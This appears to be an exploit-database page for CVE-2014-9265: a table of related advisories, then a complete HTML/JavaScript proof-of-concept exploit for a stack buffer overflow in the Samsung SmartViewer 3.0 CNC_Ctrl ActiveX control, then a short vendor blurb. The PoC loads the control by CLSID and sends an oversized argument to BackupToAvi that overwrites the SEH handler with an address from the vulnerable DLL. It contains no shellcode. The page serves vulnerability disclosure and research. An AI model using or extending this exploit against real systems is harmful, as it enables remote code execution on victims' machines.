| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Samsung SmartViewer CNC_Ctrl ActiveX Control Buffer Overflow (CVE-2012-4333; CVE-2014-9265) | 19 Jan 201500:00 | – | checkpoint_advisories | |
| CVE-2014-9265 | 8 Dec 201416:00 | – | cve | |
| CVE-2014-9265 | 8 Dec 201416:00 | – | cvelist | |
| Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution | 19 Jan 201500:00 | – | exploitdb | |
| EUVD-2014-9090 | 7 Oct 202500:30 | – | euvd | |
| Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution | 19 Jan 201500:00 | – | exploitpack | |
| CVE-2014-9265 | 8 Dec 201416:59 | – | nvd | |
| Samsung SmartViewer BackupToAvi 3.0 Remote Code Execution | 19 Jan 201500:00 | – | packetstorm | |
| Stack overflow | 8 Dec 201416:59 | – | prion | |
| Samsung SmartViewer CNC_Ctrl ActiveX Control BackupToAvi Remote Code Execution Vulnerability | 4 Dec 201400:00 | – | zdi |
<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam
For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++)
{
buf1 += "A";
}
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;
//remaining buffer
for (j=0; j<(payload_length-junk.length); j++)
{
buf2 += "B";
}
//final malicious buffer
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
</script>
</html>
# 0day.today [2018-02-27] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation